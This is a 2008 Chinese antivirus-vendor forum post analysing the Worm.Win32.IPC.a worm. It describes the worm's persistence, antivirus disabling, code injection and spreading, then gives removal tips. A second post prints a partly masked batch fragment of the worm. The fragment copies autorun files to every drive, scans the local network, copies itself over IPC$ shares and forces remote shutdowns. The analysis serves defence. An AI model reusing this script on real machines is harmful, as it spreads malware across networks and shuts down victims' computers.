微点交流论坛

标题: 蠕虫程序Worm.Win32.IPC.a [打印本页]

作者: pioneer 时间: 2008-3-17 18:22 标题: 蠕虫程序Worm.Win32.IPC.a

病毒名称

Worm.Win32.IPC.a

捕获时间

2008-03-17

病毒症状

该程序是使用Delphi编写的蠕虫程序，由微点主动防御软件自动捕获，采用Upack加壳方式试图躲避特征码扫描,加壳后长度为26,888字节，图标为Windows默认可执行文件图标，病毒扩展名为exe，主要通过网页木马、文件捆绑、移动存储介质的方式传播。

病毒分析

该样本程序被执行后, 拷贝自身到％systemroot％\system32目录下，重命名为int.exe；拷贝自身分别到C:\Documents and Settings\「开始」菜单\程序\启动，C:\Documents and Settings\Administrator\「开始」菜单\程序\启动，C:\Documents and Settings\All Users\「开始」菜单\程序\启动，C:\Documents and Settings\Default User\「开始」菜单\程序\启动四个目录下，重命名为login.exe，以起到随系统启动的目的；修改注册表自启动项以随系统一起启动；通过命令行taskkill /im试图将360safe.exe、360tray.exe关闭；以命令行形式修改系统时间，使部分杀毒软件不能正常使用；通过映像劫持手段重定向部分杀毒软件，当用户运行这些杀毒软件时便会激活病毒；枚举窗口查找窗口类名分别为IEFrame和Shell_TrayWnd的窗口，申请内存空间将病毒一部分代码写入，并通过远程线程激活病毒代码进行代码注入逃避杀毒软件的查杀，并访问恶意网站下载其它病毒程序并运行；以批处理的形式遍历本地盘符D:到Z:，在其根目录下释放隐藏病毒文件autorun.exe和autorun.inf，使用Windows自动播放来传播病毒，且枚举局域网IPC$共享，将autorun.exe和autorun.inf进行拷贝，以达到在局域网扩散的目的,并进行远程关机。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、移动存储介质

安全提示

　　已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”，请直接选择删除处理（如图1）；

如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现" Worm.Win32.IPC.a”，请直接选择删除（如图2）。

对于未使用微点主动防御软件的用户，微点反病毒专家建议：
1、不要在不明站点下载非官方版本的软件进行安装，避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放，具体操作步骤：开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新，及时打好漏洞补丁。

[ Last edited by pioneer on 2008-3-17 at 18:27 ]

作者: pioneer 时间: 2008-3-17 18:23
技术细节

病毒修改注册表项：
项：HKLM\SoftWare\Microsoft\Windows\CurrentVersion\RUN\
键值：system
指向文件：％systemroot％\system32\int.exe

被映像劫持的杀毒软件：
360safe.exe
360tray.exe
ravstub.exe
ravmond.exe
ravmon.exe
ravtask.exe

bat文件部分内容：

for %%i in (d e f g h i j k l m n o p q r s t u v w x y z) do (
fsutil ******| findstr /i %%i || ******
dir /a/b %%i:\autorun.inf && attrib -r -s -h %%i:\autorun.inf
copy %hty1%autorun.inf %%i: & ***** +r +s +h %%i:\autorun.inf
dir /a/b %%i:\autorun.exe || (copy %hty1%autorun.exe %%i: && attrib +r +s +h %%i:\autorun.exe )
)
:attr
attrib +r +s +h %hty1%autorun.exe & attrib +r +s +h %hty1%autorun.inf
ipconfig /all |find /i "******" || (ping 127.1 -n 10 && goto sm)
for /f "tokens=15" %%i in ('ipconfig /all^|find /i "ip address"') do (
for /f "tokens=1-3 delims=." %%a in ("%%i") do (
if %%a EQU 192 (
for /l %%e in (1,1,255) do (
ping %%a.%%b.%%c.%%e -n 1 -l 1 -w 1 &&(
for /f "********" %%t in ('net view \\%%a.%%b.%%c.%%e') do (
if "%%t" NEQ "" (
net use \\%%a.%%b.%%c.%%e\%%t /u:******** && (attrib -r -s -h %hty1%********&& copy %hty1%autorun.exe
\\%%a.%%b.%%c.%%e\%%t && attrib +r +s +h %hty1%autorun.exe && attrib -r -s -h %hty1%*******&& copy %hty1%autorun.inf
\\%%a.%%b.%%c.%%e\%%t && attrib +r +s +h %hty1%autorun.inf)
if "%%t" EQU "****$" shutdown -s -f -t 0 -m \\%%a.%%b.%%c.%%e
)
))
)
) else ping 127.1 -n 20
)
)

[ Last edited by Legend on 2008-3-18 at 10:29 ]

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn